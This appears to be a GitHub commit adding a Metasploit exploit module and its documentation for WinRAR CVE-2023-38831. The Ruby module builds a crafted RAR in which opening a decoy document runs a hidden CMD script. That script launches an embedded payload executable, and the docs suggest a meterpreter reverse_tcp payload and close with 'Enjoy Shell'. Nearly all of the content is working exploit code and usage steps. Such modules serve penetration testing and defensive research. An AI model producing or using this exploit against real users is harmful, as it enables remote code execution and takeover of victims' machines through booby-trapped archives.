-
Notifications
You must be signed in to change notification settings - Fork 14k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
2 changed files
with
131 additions
and
0 deletions.
There are no files selected for viewing
39 changes: 39 additions & 0 deletions
39
documentation/modules/exploit/windows/fileformat/winrar_cve_2023_38831.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,39 @@ | ||
| ## Vulnerable Application | ||
| This module exploits a vulnerability in WinRAR 6.22 (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start msfconsole | ||
| 1. Do: `use exploit/windows/fileformat/winrar_cve_2023_38831` | ||
| 1. Do: `set INPUT_FILE /path/to/decoy/file` | ||
| 1. Do: `set OUTPUT_FILE /path/to/output/file` | ||
| 1. Do: `set PAYLOAD windows/meterpreter/reverse_tcp` | ||
| 1. Do: `set LHOST <local IP>` | ||
| 1. Do: `set LPORT <local port>` | ||
| 1. Do: `exploit` | ||
|
|
||
| Target | ||
|
|
||
| 1. Install WinRAR 6.22 | ||
| 1. Open OUTPUT_FILE | ||
| 1. Click on INPUT_FILE withinin archive | ||
| 1. Enjoy Shell | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ### Windows | ||
| The exploit creates a RAR file that contains a decoy document and a CMD script. The CMD script is executed when the decoy document is opened, leading to code execution on the target system. | ||
|
|
||
| ## Options | ||
|
|
||
| ### INPUT_FILE | ||
| Path to the decoy file (PDF, JPG, PNG, etc.) that will be embedded in the crafted RAR file. | ||
|
|
||
| ### OUTPUT_FILE | ||
| The filename for the crafted RAR file that will be generated. | ||
|
|
||
| ## References | ||
|
|
||
| [CVE-2023-38831](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-38831) | ||
| [Group-IB Research](https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/) | ||
| [Analysis](https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/) |
92 changes: 92 additions & 0 deletions
92
modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,92 @@ | ||
| require 'zip' | ||
|
|
||
| class MetasploitModule < Msf::Exploit | ||
| Rank = ExcellentRanking | ||
|
|
||
| include Msf::Exploit::FILEFORMAT | ||
|
|
||
| def initialize(info = {}) | ||
| super(update_info(info, | ||
| 'Name' => 'WinRAR CVE-2023-38831 Exploit', | ||
| 'Description' => %q{ | ||
| This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution. | ||
| }, | ||
| 'License' => MSF_LICENSE, | ||
| 'Author' => ['Alexander "xaitax" Hagenah'], | ||
| 'References' => [ | ||
| ['CVE', '2023-38831'], | ||
| ['URL', 'https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/'], | ||
| ['URL', 'https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/'] | ||
| ], | ||
| 'Platform' => ['win'], | ||
| 'Targets' => [['Windows', {}]], | ||
| 'Payload' => | ||
| { | ||
| 'Space' => 4096, | ||
| 'DisableNops' => true | ||
| }, | ||
| 'DisclosureDate' => 'Aug 23 2023', | ||
| 'DefaultTarget' => 0, | ||
| 'Notes' => | ||
| { | ||
| 'Stability' => [CRASH_SAFE], | ||
| 'Reliability' => [REPEATABLE_SESSION], | ||
| 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] | ||
| } | ||
| )) | ||
|
|
||
| register_options([ | ||
| OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']), | ||
| OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).']) | ||
| ]) | ||
|
|
||
| register_advanced_options([ | ||
| OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload executable.', nil]) | ||
| ]) | ||
| end | ||
|
|
||
| def exploit | ||
| temp_dir = Dir.mktmpdir | ||
| output_rar = File.join(Msf::Config.local_directory, datastore['OUTPUT_FILE']) | ||
| input_file = datastore['INPUT_FILE'] | ||
| decoy_name = File.basename(input_file) | ||
| decoy_ext = ".#{File.extname(input_file)[1..]}" | ||
| payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8) + '.exe' | ||
|
|
||
| decoy_dir = File.join(temp_dir, "#{decoy_name}A") | ||
| Dir.mkdir(decoy_dir) | ||
|
|
||
| exe_payload = Msf::Util::EXE.to_win32pe(framework, payload.encoded) | ||
|
|
||
| payload_path = File.join(decoy_dir, payload_name) | ||
| File.open(payload_path, "wb") { |file| file.write(exe_payload) } | ||
|
|
||
| bat_script = <<~BAT | ||
| @echo off | ||
| start "" "%~dp0#{payload_name}" | ||
| start "" "%~dp0#{decoy_name}" | ||
| BAT | ||
|
|
||
| bat_path = File.join(decoy_dir, "#{decoy_name}A.cmd") | ||
| File.write(bat_path, bat_script) | ||
|
|
||
| FileUtils.cp(input_file, File.join(temp_dir, "#{decoy_name}B")) | ||
|
|
||
| zip_path = File.join(temp_dir, 'template.zip') | ||
| Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile| | ||
| zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B")) | ||
| zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path) | ||
| zipfile.add("#{decoy_name}A/#{payload_name}", payload_path) | ||
| end | ||
|
|
||
| content = File.binread(zip_path) | ||
| content.gsub!(decoy_ext + "A", decoy_ext + " ") | ||
| content.gsub!(decoy_ext + "B", decoy_ext + " ") | ||
|
|
||
| File.binwrite(output_rar, content) | ||
|
|
||
| print_good("Created #{output_rar}") | ||
|
|
||
| FileUtils.remove_entry_secure(temp_dir) | ||
| end | ||
| end |